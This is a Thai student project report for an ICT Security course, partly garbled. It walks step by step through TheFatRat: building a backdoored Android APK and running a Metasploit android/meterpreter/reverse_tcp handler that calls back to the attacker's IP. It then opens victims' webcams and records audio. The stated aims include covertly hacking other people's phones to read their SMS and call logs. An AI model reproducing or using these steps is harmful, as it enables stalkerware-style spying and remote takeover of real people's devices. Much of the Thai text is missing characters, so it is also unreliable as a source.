โครงงาน วิชา 322376 ICT Security · โครงงาน วิชา 322376...
18
โครงงาน วิชา 322376 ICT Security นางสาวชนันท์ภักค์ ทวีชัยจุฑานนท์ 573020800-9 นางสาวณัฐสุดา ธนานุกูลสมบัติ 573020805-9 นางสาวพินิตสุภา หาญสมบัติ 573020815-6 นายขัตติยะ ศรีพันดอน 573021381-8 นายปวริศ บุตรพันธ์ 573021400-0 นางสาวภรณ์นภัส กูลอิทธิเชษฐ์ 573021404-2 อาจารย์ประจาวิชา รศ.ดร.จักรชัย โสอินทร์ สาขาเทคโนโลยีสารสนเทศและการสื ่อสาร ภาควิชาวิทยาการคอมพิวเตอร์ คณะวิทยาศาสตร์ มหาวิทยาลัยขอนแก่น
Transcript of โครงงาน วิชา 322376 ICT Security · โครงงาน วิชา 322376...
โครงงาน
วชา 322376 ICT Security
นางสาวชนนทภกค ทวชยจฑานนท 573020800-9
นางสาวณฐสดา ธนานกลสมบต 573020805-9
นางสาวพนตสภา หาญสมบต 573020815-6
นายขตตยะ ศรพนดอน 573021381-8
นายปวรศ บตรพนธ 573021400-0
นางสาวภรณนภส กลอทธเชษฐ 573021404-2
อาจารยประจ าวชา
รศ.ดร.จกรชย โสอนทร
สาขาเทคโนโลยสารสนเทศและการสอสาร
ภาควชาวทยาการคอมพวเตอร คณะวทยาศาสตร
มหาวทยาลยขอนแกน
1. วชา 322376 ความมนคงเทคโนโลยสารสนเทศและการสอสาร โดย อ.จกรชย โสอนทร
2. หลกการและเหตผล ท าท าไม?
ท ำใหเรำสำมำรถแฮกขอมล แกไขขอมล และเพมควำมสำมำรถใหกบตวระบบของเรำได ตวอยำงฟงชนทมประโยชนทเรำ
ไดมำหลงจำกกำร ใช fatrat เชน กำรแฮคเปดกลองของคนอน กำรแบบดขอมลบนทกกำรโทรเขำ-ออก และ ขอมล sms ได
โดยทเครองเปำหมำยไมสำมำรถรได
3.วตถประสงค
-ท ำกำร Hack android ของคนอน เพอท ำใหตวเองกลำยเปน Adminstrator เพอทจะทสำมำรถแกไขไฟล ตงคำกำรท ำงำน
และดงขอมลภำยในเครองท Hack ได
4. มคนท ำหรอยง 2 คน/งำน; ภำพรวม จะท ำอะไร ประมำณไหน วำดภำพใหเหนภำพ และ/หรอ อธบำยเครองมอทจะมำ
ปรบแตง ตดตงใหเหนภำพ (references)
1. วชำ 322376 ICT Security โดย อ.จกรชย โสอนทร
2. ปญหำกำรโจมต ดำนเวบมควำมส ำคญ มคำสถต เสยหำยเทำไร
3. จะศกษำกำรโจมต Web Security + จะตดตงวธกำรโจมตแบบ man-in-the-middle
4. งำนวจยทเกยวของ
4.1 SubSeven ควำมสำมำรถ : ท ำใหกอใหเกดควำมเสยหำยเชน ซอนเคอรเซอรคอมพวเตอร เปลยนกำรตงคำ
ระบบ หรอโหลดขนเวบไซต อกทงขโมยรหสผำนและรำยละเอยดบตรเครดต
4.2 AndroRAT ควำมสำมำรถ : ผ โจมตสำมำรถขดขอมลสวนบคคลจำกโทรศพททใช AndroidAndroRAT สำมำรถ
เรยกดบนทกกำรโทรของโทรศพทตรวจสอบขอควำม SMS และโทรถำยภำพและโทรออก สำมำรถใชเครองผกแพคเกจ
AndroRAT ลง app ทถกตองตำมกฎหมำยทมอง เชน เกม Angry Birds เครองผกคำใชจำย $ 37 ถงซอออนไลนขณะ
AndroRAT เปนแหลงฟร
5. ภำพรวม
- เครองมอทใช VMware + Kali Linux
5.ขนตอนการตดตงและใชงาน
1.ดำวนโหลดโปรแกรม โดยใชฟงกชน Git ใน Command ดวยค ำสง
Git clone https://github.com/Screec/TheFatRat.git
เสรจแลวยำย path ไปท Folder ทเรำโหลดไว
2.เสรจแลวไปท Folder ทเรำ set up ไว cd TheFatRat แลวท ำกำรใชค ำสง cd setup/
# chmod +x setup.sh && ./setup.sh เพอ setup Program
3.ขนตอไปจะท ำกำรเปด program FatRat โดยใชค ำสง
# Chmod +x fatrat
# Chmod +x powerfull.sh
# .fatrat
4.นคอฟงกชน ท fatrat ใหมำ ในกรณจะใช ฟงกชนท 01 คอฟงกชน CREAT BACKDOOR WITH MSFVENOM
5.หนำนจะใหเลอก ระบบปฏบตกำร ในกรณเลอก 3 ANDROID >> FatRat.apk
6.เสรจแลว Program จะใหใส IP เครอง(IP หำไดจำกค ำสง # ifconfig)
ในกรณน IP คอ 10.199.2.59
ตง Port:1111 เสรจแลว
ตงชอไฟลทเรำตองกำร securitysec3
7.ตอไปจะท ำกำรเปด Sever เพอรบ App ทเรำสรำงไว และท ำกำรสงขอมลเขำไปโดยใชค ำสง
# msfconsole
8.เสรจแลวกท ำกำร set payload android ทเรำสรำงไว set payload android/meterpreter/reverse_tcp
เสรจแลวท ำกำร set IP :10.199.2.59 และ set port:1111
เสรจแลว เปดท ำกำรรบ progress: exploit
9. เสรจแลวเหยอของเรำกจะท ำกำร connect มำ
เสรจแลวเปดค ำสง Help จะมฟงกชนตำงๆใหเลอก
10.ในทนเรำจะยกตวอยำงกำร กำรเปด webcam โดยใชค ำสง webcam_stream
เพอแฮคเปกกลองของคนอนโดยทเขำไมรตว ไมสำมำรถตรวจสอบได และไมสำมำรถปดได
ยกตวอยางฟงชนตางๆทโปรแกรมสามารถท าได
รายชอฟงชนแตละหมวด
รปตอไปเปนค าสงเปนค าสงทเกยวกะ core meterpreter
เรำขอขำมไป ทค ำสงทเกยวกบ andriod เลยนะครบ
และสวน รปนกเปนค ำสงพนฐำน ในcommand windows ทเรำเรยนกนมำ
อนน ลองอำนๆ dischap ด
นเปนกำร เชค process ท Run อยปจจบน
นเปนค ำสง อดเสยงเปนเวลำ 10ว
ค ำสงเปด webcam chat มนเปดไมไดเพรำะโทรสบไมม
